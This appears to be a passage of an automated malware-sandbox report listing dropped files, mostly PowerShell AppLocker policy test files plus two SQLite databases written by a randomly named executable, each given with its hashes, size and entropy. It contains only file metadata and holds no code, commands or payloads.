                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khaevk0e.efr.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki52t4wb.gru.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvb4dlqg.hlt.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvgipad5.uxw.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_newajdzk.tnt.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmbznnfe.s11.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o02l32zc.uwj.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_op1m41qt.zxf.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5lw5tt5.bzj.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pek453uf.2hd.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfhm50ta.itx.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcvc45uj.02r.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rek4wjpt.t31.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfc2bkjw.vnk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_st0eatwy.htn.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1c5njrd.2zg.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3wbefcz.rhd.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trzche4s.kid.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uihfdbgw.gew.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzsm43ly.ci0.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfxdxwfb.m5a.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvv2kbcg.lzk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbobfdmm.n1u.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnivzt05.nx1.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwygohlv.5wi.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1wa1ykb.ucb.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymu4osyc.5j3.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw0kfq0s.1mb.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\bMTLPAh7lt

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\gonTTPwCzB

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136413900497188
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
